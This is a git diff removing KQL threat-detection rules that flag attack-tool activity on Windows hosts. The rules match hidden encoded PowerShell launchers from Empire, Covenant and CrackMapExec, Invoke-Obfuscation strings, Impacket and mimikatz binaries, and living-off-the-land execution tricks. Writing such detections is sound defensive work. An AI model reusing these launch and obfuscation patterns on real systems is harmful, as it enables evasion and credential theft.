-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the creation of files with an executable or script extension by an Office application.
-// Tags: attack.t1204.002, attack.execution
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\visio.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".ocx" or FolderPath endswith ".proj" or FolderPath endswith ".ps1" or FolderPath endswith ".scf" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf" or FolderPath endswith ".wsh")) and (not((FolderPath contains "\\AppData\\Local\\assembly\\tmp\\" and FolderPath endswith ".dll"))) and (not(((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Local\\Temp\\webexdelta\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")) or ((FolderPath contains "C:\\Users\\" and FolderPath contains "\\AppData\\Local\\Microsoft\\Office\\" and FolderPath contains "\\WebServiceCache\\AllUsers") and FolderPath endswith ".com"))))
\ No newline at end of file
diff --git a/Execution/Forfiles_Command_Execution.kql b/Execution/Forfiles_Command_Execution.kql
deleted file mode 100644
index 1805c4a9..00000000
--- a/Execution/Forfiles_Command_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Tim Rauch, Elastic, E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2022/06/14
-// Level: medium
-// Description: Detects the execution of "forfiles" with the "/c" flag.
-While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
-Can be used to bypass application whitelisting.
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\forfiles.exe" or ProcessVersionInfoOriginalFileName =~ "forfiles.exe")
\ No newline at end of file
diff --git a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql b/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql
deleted file mode 100644
index 5a0c3e9b..00000000
--- a/Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/03/02
-// Level: medium
-// Description: A symbolic link is a type of file that contains a reference to another file.
-This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
-
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "behavior " and ProcessCommandLine contains "set " and ProcessCommandLine contains "SymlinkEvaluation") and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql b/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql
deleted file mode 100644
index 030862ee..00000000
--- a/Execution/GAC_DLL_Loaded_Via_Office_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: high
-// Description: Detects any GAC DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath startswith "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql b/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
deleted file mode 100644
index 25771e32..00000000
--- a/Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (FolderPath endswith "\\CertReq.exe" or FolderPath endswith "\\CertUtil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\MSbuild.exe" or FolderPath endswith "\\MSHTA.EXE" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql b/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql
deleted file mode 100644
index 10ec08bc..00000000
--- a/Execution/HackTool_-_Covenant_PowerShell_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2020/06/04
-// Level: high
-// Description: Detects suspicious command lines used in Covenant luanchers
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1564.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-Command" or ProcessCommandLine contains "-EncodedCommand") and (ProcessCommandLine contains "-Sta" and ProcessCommandLine contains "-Nop" and ProcessCommandLine contains "-Window" and ProcessCommandLine contains "Hidden")) or (ProcessCommandLine contains "sv o (New-Object IO.MemorySteam);sv d " or ProcessCommandLine contains "mshta file.hta" or ProcessCommandLine contains "GruntHTTP" or ProcessCommandLine contains "-EncodedCommand cwB2ACAAbwAgA")
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_Execution.kql b/Execution/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Execution/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql b/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql
deleted file mode 100644
index 9f4071c7..00000000
--- a/Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: Detects various execution patterns of the CrackMapExec pentesting framework
-// Tags: attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc "
\ No newline at end of file
diff --git a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql b/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
deleted file mode 100644
index bc2833d5..00000000
--- a/Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2020/05/22
-// Level: high
-// Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "join" and ProcessCommandLine contains "split") or ProcessCommandLine contains "( $ShellId[1]+$ShellId[13]+'x')" or (ProcessCommandLine contains "( $PSHome[" and ProcessCommandLine contains "]+$PSHOME[" and ProcessCommandLine contains "]+") or ProcessCommandLine contains "( $env:Public[13]+$env:Public[5]+'x')" or (ProcessCommandLine contains "( $env:ComSpec[4," and ProcessCommandLine contains ",25]-Join'')") or ProcessCommandLine contains "[1,3]+'x'-Join'')") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql b/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql
deleted file mode 100644
index b509eb86..00000000
--- a/Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/04/20
-// Level: high
-// Description: Detects suspicious powershell command line parameters used in Empire
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -NoP -sta -NonI -W Hidden -Enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc " or ProcessCommandLine contains " -NoP -NonI -W Hidden -enc " or ProcessCommandLine contains " -noP -sta -w 1 -enc" or ProcessCommandLine contains " -enc  SQB" or ProcessCommandLine contains " -nop -exec bypass -EncodedCommand "
\ No newline at end of file
diff --git a/Execution/HackTool_-_Impacket_Tools_Execution.kql b/Execution/HackTool_-_Impacket_Tools_Execution.kql
deleted file mode 100644
index dd80528d..00000000
--- a/Execution/HackTool_-_Impacket_Tools_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/24
-// Level: high
-// Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
-// Tags: attack.execution, attack.t1557.001
-DeviceProcessEvents
-| where (FolderPath contains "\\goldenPac" or FolderPath contains "\\karmaSMB" or FolderPath contains "\\kintercept" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\rpcdump" or FolderPath contains "\\samrdump" or FolderPath contains "\\secretsdump" or FolderPath contains "\\smbexec" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\wmiexec" or FolderPath contains "\\wmipersist") or (FolderPath endswith "\\atexec_windows.exe" or FolderPath endswith "\\dcomexec_windows.exe" or FolderPath endswith "\\dpapi_windows.exe" or FolderPath endswith "\\findDelegation_windows.exe" or FolderPath endswith "\\GetADUsers_windows.exe" or FolderPath endswith "\\GetNPUsers_windows.exe" or FolderPath endswith "\\getPac_windows.exe" or FolderPath endswith "\\getST_windows.exe" or FolderPath endswith "\\getTGT_windows.exe" or FolderPath endswith "\\GetUserSPNs_windows.exe" or FolderPath endswith "\\ifmap_windows.exe" or FolderPath endswith "\\mimikatz_windows.exe" or FolderPath endswith "\\netview_windows.exe" or FolderPath endswith "\\nmapAnswerMachine_windows.exe" or FolderPath endswith "\\opdump_windows.exe" or FolderPath endswith "\\psexec_windows.exe" or FolderPath endswith "\\rdp_check_windows.exe" or FolderPath endswith "\\sambaPipe_windows.exe" or FolderPath endswith "\\smbclient_windows.exe" or FolderPath endswith "\\smbserver_windows.exe" or FolderPath endswith "\\sniff_windows.exe" or FolderPath endswith "\\sniffer_windows.exe" or FolderPath endswith "\\split_windows.exe" or FolderPath endswith "\\ticketer_windows.exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql b/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql
deleted file mode 100644
index 9f71a8e1..00000000
--- a/Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022/05/24
-// Level: medium
-// Description: Detects the use of Jlaive to execute assemblies in a copied PowerShell
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine endswith ".bat" and InitiatingProcessFolderPath endswith "\\cmd.exe") and (((ProcessCommandLine contains "powershell.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "pwsh.exe" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\xcopy.exe") or ((ProcessCommandLine contains "+s" and ProcessCommandLine contains "+h" and ProcessCommandLine contains ".bat.exe") and FolderPath endswith "\\attrib.exe"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_Koadic_Execution.kql b/Execution/HackTool_-_Koadic_Execution.kql
deleted file mode 100644
index 48fb0d16..00000000
--- a/Execution/HackTool_-_Koadic_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: wagga, Jonhnathan Ribeiro, oscd.community
-// Date: 2020/01/12
-// Level: high
-// Description: Detects command line parameters used by Koadic hack tool
-// Tags: attack.execution, attack.t1059.003, attack.t1059.005, attack.t1059.007
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "chcp") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql b/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
deleted file mode 100644
index 3ef522cf..00000000
--- a/Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch
-// Date: 2019/09/03
-// Level: high
-// Description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/C" and ProcessCommandLine contains "Windows\\Temp\\" and ProcessCommandLine contains "&1") and (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs" or InitiatingProcessCommandLine contains "taskeng.exe")) or ((ProcessCommandLine contains "cmd.exe" and ProcessCommandLine contains "/Q" and ProcessCommandLine contains "/c" and ProcessCommandLine contains "\\\\127.0.0.1\\" and ProcessCommandLine contains "&1") and (InitiatingProcessFolderPath endswith "\\wmiprvse.exe" or InitiatingProcessFolderPath endswith "\\mmc.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\services.exe"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql b/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
deleted file mode 100644
index 90d50234..00000000
--- a/Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
-// Tags: attack.execution, attack.defense_evasion, attack.t1106, attack.t1059.003, attack.t1218.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "gthread-3.6.dll" or ProcessCommandLine contains "\\Windows\\Temp\\tmp.bat" or ProcessCommandLine contains "sigcmm-2.4.dll") and (FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql b/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql
deleted file mode 100644
index 222c3f7c..00000000
--- a/Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/08/25
-// Level: critical
-// Description: Detects process activity patterns as seen being used by Sliver C2 framework implants
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8"
\ No newline at end of file
diff --git a/Execution/HackTool_-_Stracciatella_Execution.kql b/Execution/HackTool_-_Stracciatella_Execution.kql
deleted file mode 100644
index fbafb340..00000000
--- a/Execution/HackTool_-_Stracciatella_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.
-// Tags: attack.execution, attack.defense_evasion, attack.t1059, attack.t1562.001
-DeviceProcessEvents
-| where FolderPath endswith "\\Stracciatella.exe" or ProcessVersionInfoOriginalFileName =~ "Stracciatella.exe" or ProcessVersionInfoFileDescription =~ "Stracciatella" or (SHA256 startswith "9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956" or SHA256 startswith "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a") or (SHA256 in~ ("9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956", "fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a"))
\ No newline at end of file
diff --git a/Execution/HackTool_-_WinPwn_Execution.kql b/Execution/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Execution/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 2a00e9b4..00000000
--- a/Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where ProcessCommandLine contains "csproduct" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql b/Execution/Hidden_Powershell_in_Link_File_Pattern.kql
deleted file mode 100644
index e96c12e8..00000000
--- a/Execution/Hidden_Powershell_in_Link_File_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/06
-// Level: medium
-// Description: Detects events that appear when a user click on a link file with a powershell command in it
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".lnk") and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe"
\ No newline at end of file
diff --git a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql b/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
deleted file mode 100644
index 914b3568..00000000
--- a/Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/05
-// Level: high
-// Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
-
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProtocolDefaults" and ProcessCommandLine contains "http" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql b/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql
deleted file mode 100644
index a95b8202..00000000
--- a/Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/10
-// Level: medium
-// Description: Detects powershell scripts that import modules from suspicious directories
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Import-Module \"$Env:Temp\\" or ProcessCommandLine contains "Import-Module '$Env:Temp\\" or ProcessCommandLine contains "Import-Module $Env:Temp\\" or ProcessCommandLine contains "Import-Module \"$Env:Appdata\\" or ProcessCommandLine contains "Import-Module '$Env:Appdata\\" or ProcessCommandLine contains "Import-Module $Env:Appdata\\" or ProcessCommandLine contains "Import-Module C:\\Users\\Public\\" or ProcessCommandLine contains "ipmo \"$Env:Temp\\" or ProcessCommandLine contains "ipmo '$Env:Temp\\" or ProcessCommandLine contains "ipmo $Env:Temp\\" or ProcessCommandLine contains "ipmo \"$Env:Appdata\\" or ProcessCommandLine contains "ipmo '$Env:Appdata\\" or ProcessCommandLine contains "ipmo $Env:Appdata\\" or ProcessCommandLine contains "ipmo C:\\Users\\Public\\"
\ No newline at end of file
diff --git a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql b/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
deleted file mode 100644
index 786d5065..00000000
--- a/Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: A. Sungurov , oscd.community
-// Date: 2020/10/12
-// Level: low
-// Description: Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Execution/Insecure_Transfer_Via_Curl.EXE.kql b/Execution/Insecure_Transfer_Via_Curl.EXE.kql
deleted file mode 100644
index c4a97253..00000000
--- a/Execution/Insecure_Transfer_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "--insecure" flag.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-k\\s" or ProcessCommandLine contains "--insecure") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql b/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql
deleted file mode 100644
index 5c46388e..00000000
--- a/Execution/Install_New_Package_Via_Winget_Local_Manifest.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman, Florian Roth (Nextron Systems), frack113
-// Date: 2020/04/21
-// Level: medium
-// Description: Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.
-The manifest option enables you to install an application by passing in a YAML file directly to the client.
-Winget can be used to download and install exe, msi or msix files later.
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and (ProcessCommandLine contains "install" or ProcessCommandLine contains " add ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "--manifest")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql b/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql
deleted file mode 100644
index 4af2d38a..00000000
--- a/Execution/Invoke-Obfuscation_CLIP+_Launcher.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonathan Cheong, oscd.community
-// Date: 2020/10/13
-// Level: high
-// Description: Detects Obfuscated use of Clip.exe to execute PowerShell
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/r") and (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "&&" and ProcessCommandLine contains "clipboard]::" and ProcessCommandLine contains "-f")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql b/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
deleted file mode 100644
index b42471c1..00000000
--- a/Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "system.io.compression.deflatestream" or ProcessCommandLine contains "system.io.streamreader" or ProcessCommandLine contains "readtoend(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "text.encoding]::ascii")
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql b/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
deleted file mode 100644
index c693d26a..00000000
--- a/Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community
-// Date: 2019/11/08
-// Level: high
-// Description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[" or ProcessCommandLine matches regex "\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[" or ProcessCommandLine matches regex "\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[" or ProcessCommandLine matches regex "\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}" or ProcessCommandLine matches regex "\\*mdr\\*\\W\\s*\\)\\.Name" or ProcessCommandLine matches regex "\\$VerbosePreference\\.ToString\\(" or ProcessCommandLine matches regex "\\[String\\]\\s*\\$VerbosePreference"
\ No newline at end of file
diff --git a/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql b/Execution/Invoke-Obfuscation_STDIN+_Launcher.kql
deleted file mode 100644
index 4108ea3f..00000000
